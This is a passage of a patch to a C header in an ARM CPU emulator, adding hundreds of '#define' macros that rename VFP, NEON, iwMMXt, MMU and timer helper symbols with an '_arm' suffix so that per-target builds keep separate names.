gen_vfp_ld_arm +#define gen_vfp_mrs gen_vfp_mrs_arm +#define gen_vfp_msr gen_vfp_msr_arm +#define gen_vfp_mul gen_vfp_mul_arm +#define gen_vfp_neg gen_vfp_neg_arm +#define gen_vfp_shto gen_vfp_shto_arm +#define gen_vfp_sito gen_vfp_sito_arm +#define gen_vfp_slto gen_vfp_slto_arm +#define gen_vfp_sqrt gen_vfp_sqrt_arm +#define gen_vfp_st gen_vfp_st_arm +#define gen_vfp_sub gen_vfp_sub_arm +#define gen_vfp_tosh gen_vfp_tosh_arm +#define gen_vfp_tosi gen_vfp_tosi_arm +#define gen_vfp_tosiz gen_vfp_tosiz_arm +#define gen_vfp_tosl gen_vfp_tosl_arm +#define gen_vfp_touh gen_vfp_touh_arm +#define gen_vfp_toui gen_vfp_toui_arm +#define gen_vfp_touiz gen_vfp_touiz_arm +#define gen_vfp_toul gen_vfp_toul_arm +#define gen_vfp_uhto gen_vfp_uhto_arm +#define gen_vfp_uito gen_vfp_uito_arm +#define gen_vfp_ulto gen_vfp_ulto_arm +#define get_arm_cp_reginfo get_arm_cp_reginfo_arm +#define get_clock get_clock_arm +#define get_clock_realtime get_clock_realtime_arm +#define get_constraint_priority get_constraint_priority_arm +#define get_float_exception_flags get_float_exception_flags_arm +#define get_float_rounding_mode get_float_rounding_mode_arm +#define get_fpstatus_ptr get_fpstatus_ptr_arm +#define get_level1_table_address get_level1_table_address_arm +#define get_mem_index get_mem_index_arm +#define get_next_param_value get_next_param_value_arm +#define get_opt_name get_opt_name_arm +#define get_opt_value get_opt_value_arm +#define get_page_addr_code get_page_addr_code_arm +#define get_param_value get_param_value_arm +#define get_phys_addr get_phys_addr_arm +#define get_phys_addr_lpae get_phys_addr_lpae_arm +#define get_phys_addr_mpu get_phys_addr_mpu_arm +#define get_phys_addr_v5 get_phys_addr_v5_arm +#define get_phys_addr_v6 get_phys_addr_v6_arm +#define get_system_memory get_system_memory_arm +#define get_ticks_per_sec get_ticks_per_sec_arm +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_arm +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__arm +#define gt_cntfrq_access gt_cntfrq_access_arm +#define gt_cnt_read gt_cnt_read_arm +#define gt_cnt_reset gt_cnt_reset_arm +#define gt_counter_access gt_counter_access_arm +#define gt_ctl_write gt_ctl_write_arm +#define gt_cval_write gt_cval_write_arm +#define gt_get_countervalue gt_get_countervalue_arm +#define gt_pct_access gt_pct_access_arm +#define gt_ptimer_access gt_ptimer_access_arm +#define gt_recalc_timer gt_recalc_timer_arm +#define gt_timer_access gt_timer_access_arm +#define gt_tval_read gt_tval_read_arm +#define gt_tval_write gt_tval_write_arm +#define gt_vct_access gt_vct_access_arm +#define gt_vtimer_access gt_vtimer_access_arm +#define guest_phys_blocks_free guest_phys_blocks_free_arm +#define guest_phys_blocks_init guest_phys_blocks_init_arm +#define handle_vcvt handle_vcvt_arm +#define handle_vminmaxnm handle_vminmaxnm_arm +#define handle_vrint handle_vrint_arm +#define handle_vsel handle_vsel_arm +#define has_help_option has_help_option_arm +#define have_bmi1 have_bmi1_arm +#define have_bmi2 have_bmi2_arm +#define hcr_write hcr_write_arm +#define helper_access_check_cp_reg helper_access_check_cp_reg_arm +#define helper_add_saturate helper_add_saturate_arm +#define helper_add_setq helper_add_setq_arm +#define helper_add_usaturate helper_add_usaturate_arm +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_arm +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_arm +#define helper_be_ldq_mmu helper_be_ldq_mmu_arm +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_arm +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_arm +#define helper_be_ldul_mmu helper_be_ldul_mmu_arm +#define helper_be_lduw_mmu helper_be_lduw_mmu_arm +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_arm +#define helper_be_stl_mmu helper_be_stl_mmu_arm +#define helper_be_stq_mmu helper_be_stq_mmu_arm +#define helper_be_stw_mmu helper_be_stw_mmu_arm +#define helper_clear_pstate_ss helper_clear_pstate_ss_arm +#define helper_clz_arm helper_clz_arm_arm +#define helper_cpsr_read helper_cpsr_read_arm +#define helper_cpsr_write helper_cpsr_write_arm +#define helper_crc32_arm helper_crc32_arm_arm +#define helper_crc32c helper_crc32c_arm +#define helper_crypto_aese helper_crypto_aese_arm +#define helper_crypto_aesmc helper_crypto_aesmc_arm +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_arm +#define helper_crypto_sha1h helper_crypto_sha1h_arm +#define helper_crypto_sha1su1 helper_crypto_sha1su1_arm +#define helper_crypto_sha256h helper_crypto_sha256h_arm +#define helper_crypto_sha256h2 helper_crypto_sha256h2_arm +#define helper_crypto_sha256su0 helper_crypto_sha256su0_arm +#define helper_crypto_sha256su1 helper_crypto_sha256su1_arm +#define helper_dc_zva helper_dc_zva_arm +#define helper_double_saturate helper_double_saturate_arm +#define helper_exception_internal helper_exception_internal_arm +#define helper_exception_return helper_exception_return_arm +#define helper_exception_with_syndrome helper_exception_with_syndrome_arm +#define helper_get_cp_reg helper_get_cp_reg_arm +#define helper_get_cp_reg64 helper_get_cp_reg64_arm +#define helper_get_r13_banked helper_get_r13_banked_arm +#define helper_get_user_reg helper_get_user_reg_arm +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_arm +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_arm +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_arm +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_arm +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_arm +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_arm +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_arm +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_arm +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_arm +#define helper_iwmmxt_addub helper_iwmmxt_addub_arm +#define helper_iwmmxt_addul helper_iwmmxt_addul_arm +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_arm +#define helper_iwmmxt_align helper_iwmmxt_align_arm +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_arm +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_arm +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_arm +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_arm +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_arm +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_arm +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_arm +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_arm +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_arm +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_arm +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_arm +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_arm +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_arm +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_arm +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_arm +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_arm +#define helper_iwmmxt_insr helper_iwmmxt_insr_arm +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_arm +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_arm +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_arm +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_arm +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_arm +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_arm +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_arm +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_arm +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_arm +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_arm +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_arm +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_arm +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_arm +#define helper_iwmmxt_minub helper_iwmmxt_minub_arm +#define helper_iwmmxt_minul helper_iwmmxt_minul_arm +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_arm +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_arm +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_arm +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_arm +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_arm +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_arm +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_arm +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_arm +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_arm +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_arm +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_arm +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_arm +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_arm +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_arm +#define helper_iwmmxt_packul helper_iwmmxt_packul_arm +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_arm +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_arm +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_arm +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_arm +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_arm +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_arm +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_arm +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_arm +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_arm +#define helper_iwmmxt_slll helper_iwmmxt_slll_arm +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_arm +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_arm +#define helper_iwmmxt_sral helper_iwmmxt_sral_arm +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_arm +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_arm +#define helper_iwmmxt_srll helper_iwmmxt_srll_arm +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_arm +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_arm +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_arm +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_arm +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_arm +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_arm +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_arm +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_arm +#define helper_iwmmxt_subub helper_iwmmxt_subub_arm +#define helper_iwmmxt_subul helper_iwmmxt_subul_arm +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_arm +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_arm +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_arm +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_arm +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_arm +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_arm +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_arm +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_arm +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_arm +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_arm +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_arm +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_arm +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_arm +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_arm +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_arm +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_arm +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_arm +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_arm +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_arm +#define helper_ldb_cmmu helper_ldb_cmmu_arm +#define helper_ldb_mmu helper_ldb_mmu_arm +#define helper_ldl_cmmu helper_ldl_cmmu_arm +#define helper_ldl_mmu helper_ldl_mmu_arm +#define helper_ldq_cmmu helper_ldq_cmmu_arm +#define helper_ldq_mmu helper_ldq_mmu_arm +#define helper_ldw_cmmu helper_ldw_cmmu_arm +#define helper_ldw_mmu helper_ldw_mmu_arm +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_arm +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_arm +#define helper_le_ldq_mmu helper_le_ldq_mmu_arm +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_arm +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_arm +#define helper_le_ldul_mmu helper_le_ldul_mmu_arm +#define helper_le_lduw_mmu helper_le_lduw_mmu_arm +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_arm +#define helper_le_stl_mmu helper_le_stl_mmu_arm +#define helper_le_stq_mmu helper_le_stq_mmu_arm +#define helper_le_stw_mmu helper_le_stw_mmu_arm +#define helper_msr_i_pstate helper_msr_i_pstate_arm +#define helper_neon_abd_f32 helper_neon_abd_f32_arm +#define helper_neon_abdl_s16 helper_neon_abdl_s16_arm +#define helper_neon_abdl_s32 helper_neon_abdl_s32_arm +#define helper_neon_abdl_s64 helper_neon_abdl_s64_arm +#define helper_neon_abdl_u16 helper_neon_abdl_u16_arm +#define helper_neon_abdl_u32 helper_neon_abdl_u32_arm +#define helper_neon_abdl_u64 helper_neon_abdl_u64_arm +#define helper_neon_abd_s16 helper_neon_abd_s16_arm +#define helper_neon_abd_s32 helper_neon_abd_s32_arm +#define helper_neon_abd_s8 helper_neon_abd_s8_arm +#define helper_neon_abd_u16 helper_neon_abd_u16_arm +#define helper_neon_abd_u32 helper_neon_abd_u32_arm +#define helper_neon_abd_u8 helper_neon_abd_u8_arm +#define helper_neon_abs_s16 helper_neon_abs_s16_arm +#define helper_neon_abs_s8 helper_neon_abs_s8_arm +#define helper_neon_acge_f32 helper_neon_acge_f32_arm +#define helper_neon_acge_f64 helper_neon_acge_f64_arm +#define helper_neon_acgt_f32 helper_neon_acgt_f32_arm +#define helper_neon_acgt_f64 helper_neon_acgt_f64_arm +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_arm +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_arm +#define helper_neon_addl_u16 helper_neon_addl_u16_arm +#define helper_neon_addl_u32 helper_neon_addl_u32_arm +#define helper_neon_add_u16 helper_neon_add_u16_arm +#define helper_neon_add_u8 helper_neon_add_u8_arm +#define helper_neon_ceq_f32 helper_neon_ceq_f32_arm +#define helper_neon_ceq_u16 helper_neon_ceq_u16_arm +#define helper_neon_ceq_u32 helper_neon_ceq_u32_arm +#define helper_neon_ceq_u8 helper_neon_ceq_u8_arm +#define helper_neon_cge_f32 helper_neon_cge_f32_arm +#define helper_neon_cge_s16 helper_neon_cge_s16_arm +#define helper_neon_cge_s32 helper_neon_cge_s32_arm +#define helper_neon_cge_s8 helper_neon_cge_s8_arm +#define helper_neon_cge_u16 helper_neon_cge_u16_arm +#define helper_neon_cge_u32 helper_neon_cge_u32_arm +#define helper_neon_cge_u8 helper_neon_cge_u8_arm +#define helper_neon_cgt_f32 helper_neon_cgt_f32_arm +#define helper_neon_cgt_s16 helper_neon_cgt_s16_arm +#define helper_neon_cgt_s32 helper_neon_cgt_s32_arm +#define helper_neon_cgt_s8 helper_neon_cgt_s8_arm +#define helper_neon_cgt_u16 helper_neon_cgt_u16_arm +#define helper_neon_cgt_u32 helper_neon_cgt_u32_arm +#define helper_neon_cgt_u8 helper_neon_cgt_u8_arm +#define helper_neon_cls_s16 helper_neon_cls_s16_arm +#define helper_neon_cls_s32 helper_neon_cls_s32_arm +#define helper_neon_cls_s8 helper_neon_cls_s8_arm +#define helper_neon_clz_u16 helper_neon_clz_u16_arm +#define helper_neon_clz_u8 helper_neon_clz_u8_arm +#define helper_neon_cnt_u8 helper_neon_cnt_u8_arm +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_arm +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_arm +#define helper_neon_hadd_s16 helper_neon_hadd_s16_arm +#define helper_neon_hadd_s32 helper_neon_hadd_s32_arm +#define helper_neon_hadd_s8 helper_neon_hadd_s8_arm +#define helper_neon_hadd_u16 helper_neon_hadd_u16_arm +#define helper_neon_hadd_u32 helper_neon_hadd_u32_arm +#define helper_neon_hadd_u8 helper_neon_hadd_u8_arm +#define helper_neon_hsub_s16 helper_neon_hsub_s16_arm +#define helper_neon_hsub_s32 helper_neon_hsub_s32_arm +#define helper_neon_hsub_s8 helper_neon_hsub_s8_arm +#define helper_neon_hsub_u16 helper_neon_hsub_u16_arm +#define helper_neon_hsub_u32 helper_neon_hsub_u32_arm +#define helper_neon_hsub_u8 helper_neon_hsub_u8_arm +#define helper_neon_max_s16 helper_neon_max_s16_arm +#define helper_neon_max_s32 helper_neon_max_s32_arm +#define helper_neon_max_s8 helper_neon_max_s8_arm +#define helper_neon_max_u16 helper_neon_max_u16_arm +#define helper_neon_max_u32 helper_neon_max_u32_arm +#define helper_neon_max_u8 helper_neon_max_u8_arm +#define helper_neon_min_s16 helper_neon_min_s16_arm +#define helper_neon_min_s32 helper_neon_min_s32_arm +#define helper_neon_min_s8 helper_neon_min_s8_arm +#define helper_neon_min_u16 helper_neon_min_u16_arm +#define helper_neon_min_u32 helper_neon_min_u32_arm +#define helper_neon_min_u8 helper_neon_min_u8_arm +#define helper_neon_mull_p8 helper_neon_mull_p8_arm +#define helper_neon_mull_s16 helper_neon_mull_s16_arm +#define helper_neon_mull_s8 helper_neon_mull_s8_arm +#define helper_neon_mull_u16 helper_neon_mull_u16_arm +#define helper_neon_mull_u8 helper_neon_mull_u8_arm +#define helper_neon_mul_p8 helper_neon_mul_p8_arm +#define helper_neon_mul_u16 helper_neon_mul_u16_arm +#define helper_neon_mul_u8 helper_neon_mul_u8_arm +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_arm +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_arm +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_arm +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_arm +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_arm +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_arm +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_arm +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_arm +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_arm +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_arm +#define helper_neon_narrow_u16 helper_neon_narrow_u16_arm +#define helper_neon_narrow_u8 helper_neon_narrow_u8_arm +#define helper_neon_negl_u16 helper_neon_negl_u16_arm +#define helper_neon_negl_u32 helper_neon_negl_u32_arm +#define helper_neon_paddl_u16 helper_neon_paddl_u16_arm +#define helper_neon_paddl_u32 helper_neon_paddl_u32_arm +#define helper_neon_padd_u16 helper_neon_padd_u16_arm +#define helper_neon_padd_u8 helper_neon_padd_u8_arm +#define helper_neon_pmax_s16 helper_neon_pmax_s16_arm +#define helper_neon_pmax_s8 helper_neon_pmax_s8_arm +#define helper_neon_pmax_u16 helper_neon_pmax_u16_arm +#define helper_neon_pmax_u8 helper_neon_pmax_u8_arm +#define helper_neon_pmin_s16 helper_neon_pmin_s16_arm +#define helper_neon_pmin_s8 helper_neon_pmin_s8_arm +#define helper_neon_pmin_u16 helper_neon_pmin_u16_arm +#define helper_neon_pmin_u8 helper_neon_pmin_u8_arm +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_arm +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_arm +#define helper_neon_qabs_s16 helper_neon_qabs_s16_arm +#define helper_neon_qabs_s32 helper_neon_qabs_s32_arm +#define helper_neon_qabs_s64 helper_neon_qabs_s64_arm +#define helper_neon_qabs_s8 helper_neon_qabs_s8_arm +#define helper_neon_qadd_s16 helper_neon_qadd_s16_arm +#define helper_neon_qadd_s32 helper_neon_qadd_s32_arm +#define helper_neon_qadd_s64 helper_neon_qadd_s64_arm +#define helper_neon_qadd_s8 helper_neon_qadd_s8_arm +#define helper_neon_qadd_u16 helper_neon_qadd_u16_arm +#define helper_neon_qadd_u32 helper_neon_qadd_u32_arm +#define helper_neon_qadd_u64 helper_neon_qadd_u64_arm +#define helper_neon_qadd_u8 helper_neon_qadd_u8_arm +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_arm +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_arm +#define helper_neon_qneg_s16 helper_neon_qneg_s16_arm +#define helper_neon_qneg_s32 helper_neon_qneg_s32_arm +#define helper_neon_qneg_s64 helper_neon_qneg_s64_arm +#define helper_neon_qneg_s8 helper_neon_qneg_s8_arm +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_arm +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_arm +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_arm +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_arm +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_arm +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_arm +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_arm +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_arm +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_arm +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_arm +#define helper_neon_qshl_s16 helper_neon_qshl_s16_arm +#define helper_neon_qshl_s32 helper_neon_qshl_s32_arm +#define helper_neon_qshl_s64 helper_neon_qshl_s64_arm +#define helper_neon_qshl_s8 helper_neon_qshl_s8_arm +#define helper_neon_qshl_u16 helper_neon_qshl_u16_arm +#define helper_neon_qshl_u32 helper_neon_qshl_u32_arm +#define helper_neon_qshl_u64 helper_neon_qshl_u64_arm +#define helper_neon_qshl_u8 helper_neon_qshl_u8_arm +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_arm +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_arm +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_arm +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_arm +#define helper_neon_qsub_s16 helper_neon_qsub_s16_arm +#define helper_neon_qsub_s32 helper_neon_qsub_s32_arm +#define helper_neon_qsub_s64 helper_neon_qsub_s64_arm +#define helper_neon_qsub_s8 helper_neon_qsub_s8_arm +#define helper_neon_qsub_u16 helper_neon_qsub_u16_arm +#define helper_neon_qsub_u32 helper_neon_qsub_u32_arm +#define helper_neon_qsub_u64 helper_neon_qsub_u64_arm +#define helper_neon_qsub_u8 helper_neon_qsub_u8_arm +#define helper_neon_qunzip16 helper_neon_qunzip16_arm +#define helper_neon_qunzip32 helper_neon_qunzip32_arm +#define helper_neon_qunzip8 helper_neon_qunzip8_arm +#define helper_neon_qzip16 helper_neon_qzip16_arm +#define helper_neon_qzip32 helper_neon_qzip32_arm +#define helper_neon_qzip8 helper_neon_qzip8_arm +#define helper_neon_rbit_u8 helper_neon_rbit_u8_arm +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_arm +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_arm +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_arm +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_arm +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_arm +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_arm +#define helper_neon_rshl_s16 helper_neon_rshl_s16_arm +#define helper_neon_rshl_s32 helper_neon_rshl_s32_arm +#define helper_neon_rshl_s64 helper_neon_rshl_s64_arm +#define helper_neon_rshl_s8 helper_neon_rshl_s8_arm +#define helper_neon_rshl_u16 helper_neon_rshl_u16_arm +#define helper_neon_rshl_u32 helper_neon_rshl_u32_arm +#define helper_neon_rshl_u64 helper_neon_rshl_u64_arm +#define helper_neon_rshl_u8 helper_neon_rshl_u8_arm +#define helper_neon_shl_s16 helper_neon_shl_s16_arm +#define helper_neon_shl_s32 helper_neon_shl_s32_arm +#define helper_neon_shl_s64 helper_neon_shl_s64_arm +#define helper_neon_shl_s8 helper_neon_shl_s8_arm +#define helper_neon_shl_u16 helper_neon_shl_u16_arm +#define helper_neon_shl_u32 helper_neon_shl_u32_arm +#define helper_neon_shl_u64 helper_neon_shl_u64_arm +#define helper_neon_shl_u8 helper_neon_shl_u8_arm +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_arm +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_arm +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_arm +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_arm +#define helper_neon_subl_u16 helper_neon_subl_u16_arm +#define helper_neon_subl_u32 helper_neon_subl_u32_arm +#define helper_neon_sub_u16 helper_neon_sub_u16_arm +#define helper_neon_sub_u8 helper_neon_sub_u8_arm +#define helper_neon_tbl helper_neon_tbl_arm +#define helper_neon_tst_u16 helper_neon_tst_u16_arm +#define helper_neon_tst_u32 helper_neon_tst_u32_arm +#define helper_neon_tst_u8 helper_neon_tst_u8_arm +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_arm +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_arm +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_arm +#define helper_neon_unzip16 helper_neon_unzip16_arm +#define helper_neon_unzip8 helper_neon_unzip8_arm +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_arm +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_arm +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_arm +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_arm +#define helper_neon_widen_s16 helper_neon_widen_s16_arm +#define helper_neon_widen_s8 helper_neon_widen_s8_arm +#define helper_neon_widen_u16 helper_neon_widen_u16_arm +#define helper_neon_widen_u8 helper_neon_widen_u8_arm +#define helper_neon_zip16 helper_neon_zip16_arm +#define helper_neon_zip8 helper_neon_zip8_arm +#define helper_pre_hvc helper_pre_hvc_arm +#define helper_pre_smc helper_pre_smc_arm +#define helper_qadd16 helper_qadd16_arm +#define helper_qadd8 helper_qadd8_arm +#define helper_qaddsubx helper_qaddsubx_arm +#define helper_qsub16 helper_qsub16_arm +#define helper_qsub8 helper_qsub8_arm +#define helper_qsubaddx helper_qsubaddx_arm +#define helper_rbit helper_rbit_arm +#define helper_recpe_f32 helper_recpe_f32_arm +#define helper_recpe_f64 helper_recpe_f64_arm +#define helper_recpe_u32 helper_recpe_u32_arm +#define helper_recps_f32 helper_recps_f32_arm +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_arm +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_arm +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_arm +#define helper_ret_stb_mmu helper_ret_stb_mmu_arm +#define helper_rintd helper_rintd_arm +#define helper_rintd_exact helper_rintd_exact_arm +#define helper_rints helper_rints_arm +#define helper_rints_exact helper_rints_exact_arm +#define helper_ror_cc helper_ror_cc_arm +#define helper_rsqrte_f32 helper_rsqrte_f32_arm +#define helper_rsqrte_f64 helper_rsqrte_f64_arm +#define helper_rsqrte_u32 helper_rsqrte_u32_arm +#define helper_rsqrts_f32 helper_rsqrts_f32_arm +#define helper_sadd16 helper_sadd16_arm +#define helper_sadd8 helper_sadd8_arm +#define helper_saddsubx helper_saddsubx_arm +#define helper_sar_cc helper_sar_cc_arm +#define helper_sdiv helper_sdiv_arm +#define helper_sel_flags helper_sel_flags_arm +#define helper_set_cp_reg helper_set_cp_reg_arm +#define helper_set_cp_reg64 helper_set_cp_reg64_arm +#define helper_set_neon_rmode helper_set_neon_rmode_arm +#define helper_set_r13_banked helper_set_r13_banked_arm +#define helper_set_rmode helper_set_rmode_arm +#define helper_set_user_reg helper_set_user_reg_arm +#define helper_shadd16 helper_shadd16_arm +#define helper_shadd8 helper_shadd8_arm +#define helper_shaddsubx helper_shaddsubx_arm +#define helper_shl_cc helper_shl_cc_arm +#define helper_shr_cc helper_shr_cc_arm +#define helper_shsub16 helper_shsub16_arm +#define helper_shsub8 helper_shsub8_arm +#define helper_shsubaddx helper_shsubaddx_arm +#define helper_ssat helper_ssat_arm +#define helper_ssat16 helper_ssat16_arm +#define helper_ssub16 helper_ssub16_arm +#define helper_ssub8 helper_ssub8_arm +#define helper_ssubaddx helper_ssubaddx_arm +#define helper_stb_mmu helper_stb_mmu_arm +#define helper_stl_mmu helper_stl_mmu_arm +#define helper_stq_mmu helper_stq_mmu_arm +#define helper_stw_mmu helper_stw_mmu_arm +#define helper_sub_saturate helper_sub_saturate_arm +#define helper_sub_usaturate helper_sub_usaturate_arm +#define helper_sxtb16 helper_sxtb16_arm +#define helper_uadd16 helper_uadd16_arm +#define helper_uadd8 helper_uadd8_arm +#define helper_uaddsubx helper_uaddsubx_arm +#define helper_udiv helper_udiv_arm +#define helper_uhadd16 helper_uhadd16_arm +#define helper_uhadd8 helper_uhadd8_arm +#define helper_uhaddsubx helper_uhaddsubx_arm +#define helper_uhsub16 helper_uhsub16_arm +#define helper_uhsub8 